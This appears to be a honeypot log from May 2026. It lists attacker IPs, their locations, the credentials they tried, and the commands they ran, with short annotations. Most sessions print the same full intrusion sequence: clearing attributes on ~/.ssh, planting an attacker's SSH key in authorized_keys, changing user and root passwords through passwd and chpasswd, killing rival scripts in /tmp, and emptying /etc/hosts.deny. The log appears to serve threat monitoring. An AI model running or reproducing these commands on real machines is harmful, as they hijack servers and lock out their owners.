$ echo "welltech12\nnZJ4RCZf1cf0\nnZJ4RCZf1cf0\n"|passwd
$ echo -e "sdc\nWMek7fINKwuM\nWMek7fINKwuM"|passwd|bash
$ echo "sdc\nWMek7fINKwuM\nWMek7fINKwuM\n"|passwd
🎭 wok_root_16 (192.140.186.45) β€” Shiyan, China Β· 3 sessions Β· 60 cmds
2026-05-24 19:46 EDT Β· as curl/welltech12, devadmin/devadmin, socksuser/12345
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "devadmin\nkyAgHQmcu3h5\nkyAgHQmcu3h5"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "devadmin\nkyAgHQmcu3h5\nkyAgHQmcu3h5\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "welltech12\nmYQGZblPjOoH\nmYQGZblPjOoH"|passwd|bash
$ echo "welltech12\nmYQGZblPjOoH\nmYQGZblPjOoH\n"|passwd
$ echo -e "12345\ng5RSmwJwtbHL\ng5RSmwJwtbHL"|passwd|bash
$ echo "12345\ng5RSmwJwtbHL\ng5RSmwJwtbHL\n"|passwd
🎭 cipher_root_3 (185.216.134.126) β€” Damascus, Syria Β· 3 sessions Β· 59 cmds
2026-05-07 11:56 EDT Β· as curl/welltech12, root/fjbdfdjkdsfs541544@@, steam/steam1234
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "welltech12\ngFsttKfCdDZS\ngFsttKfCdDZS"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "welltech12\ngFsttKfCdDZS\ngFsttKfCdDZS\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:3hVBAGz9SS1x"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "steam1234\n7Zb1TVlWv13O\n7Zb1TVlWv13O"|passwd|bash
$ echo "steam1234\n7Zb1TVlWv13O\n7Zb1TVlWv13O\n"|passwd
🎭 cipher_root_57 (41.208.147.131) β€” Dakar, Senegal Β· 3 sessions Β· 59 cmds
2026-05-24 19:40 EDT Β· as curl/welltech12, postgres/159357, root/fjbdfdjkdsfs541544@@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:6x6Jl1h4SJ4I"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "welltech12\nTR8rRhyzufMV\nTR8rRhyzufMV"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "welltech12\nTR8rRhyzufMV\nTR8rRhyzufMV\n"|passwd
$ echo -e "159357\nryQxGvKOzubl\nryQxGvKOzubl"|passwd|bash
$ echo "159357\nryQxGvKOzubl\nryQxGvKOzubl\n"|passwd
🎭 jade_root_14 (120.48.122.158) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-05-24 19:56 EDT Β· as root/fjbdfdjkdsfs541544@@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:ZIv0Nakud5ec"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_15 (114.130.85.36) β€” Dhaka, Bangladesh Β· 2 sessions Β· 39 cmds
2026-05-18 05:40 EDT Β· as curl/welltech12, root/Admin123!@#
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "welltech12\n9uxjOwAGPxoN\n9uxjOwAGPxoN"|passwd|bash
$ Enter new UNIX password:
$ echo "welltech12\n9uxjOwAGPxoN\n9uxjOwAGPxoN\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:XmsBRGOX25If"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 windmill_root_7 (157.22.196.246) β€” Amsterdam, The Netherlands Β· 1 session Β· 20 cmds
2026-05-24 19:39 EDT Β· as curl/welltech12
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "welltech12\n0uR4KTzZyZ3N\n0uR4KTzZyZ3N"|passwd|bash
$ Enter new UNIX password:
$ echo "welltech12\n0uR4KTzZyZ3N\n0uR4KTzZyZ3N\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_61 (43.134.87.90) β€” Singapore, Singapore Β· 4 sessions Β· 77 cmds
2026-05-17 22:24 EDT Β· as curl/welltech12, root/Asd@123321, root/Server2023#
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "welltech12\njFdUZxCANnnp\njFdUZxCANnnp"|passwd|bash
$ Enter new UNIX password:
$ echo "welltech12\njFdUZxCANnnp\njFdUZxCANnnp\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:1TfyQpu0OvVd"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ echo "root:8Q2x8eQuyly0"|chpasswd|bash
$ echo "root:5OLvEyXIZnFX"|chpasswd|bash
🎭 dragon_root_17 (36.139.163.48) β€” Guangzhou, China Β· 1 session Β· 1 cmd
2026-05-24 19:24 EDT Β· as root/ο»Ώ------fuck------
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 shadow_root_55 (101.47.8.188) β€” Singapore, Singapore Β· 1 session Β· 20 cmds
2026-05-24 19:22 EDT Β· as devadmin/devadmin
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "devadmin\n6sXuZYhFbbol\n6sXuZYhFbbol"|passwd|bash
$ Enter new UNIX password:
$ echo "devadmin\n6sXuZYhFbbol\n6sXuZYhFbbol\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 burger_3 (162.214.114.117) β€” Phoenix, United States Β· 1 session Β· 1 cmd
2026-05-24 19:08 EDT Β· as jimster/Jimster@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 burger_root_36 (15.204.55.220) β€” Hillsboro, United States Β· 3 sessions Β· 24 cmds
2026-05-24 17:35 EDT Β· as curl/welltech12, root/Cloud@2026, root/fjbdfdjkdsfs541544AA@@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "welltech12\nC2PygDFXyS01\nC2PygDFXyS01"|passwd|bash
$ Enter new UNIX password:
$ echo "welltech12\nC2PygDFXyS01\nC2PygDFXyS01\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_9 (152.32.129.236) β€” Hong Kong, Hong Kong Β· 3 sessions Β· 40 cmds
2026-05-19 07:06 EDT Β· as curl/welltech12, root/pa$$word, root/r00tr00t
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:RS9kGLMCbwA6"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:oqsmhc1UZrM4"|chpasswd|bash
🎭 ghost_root_73 (46.62.192.82) β€” Helsinki, Finland Β· 2 sessions Β· 21 cmds
2026-05-24 15:58 EDT Β· as curl/welltech12, root/fjbdfdjkdsfs541544AA@@
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:ECEBRU32XVQ3"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 yankee_root_29 (20.127.185.37) β€” Boydton, United States Β· 3 sessions Β· 41 cmds
2026-05-11 19:01 EDT Β· as curl/welltech12, root/server@321, ryan/ryan1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "ryan1234\nrzqIxeMRamkq\nrzqIxeMRamkq"|passwd|bash
$ Enter new UNIX password:
$ echo "ryan1234\nrzqIxeMRamkq\nrzqIxeMRamkq\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:YCg7qapDSiy7"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 ghost_root_74 (111.91.19.217) β€” Singapore, Singapore Β· 2 sessions Β· 4 cmds
2026-05-24 18:06 EDT Β· as curl/welltech12, root/Zxc123123
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
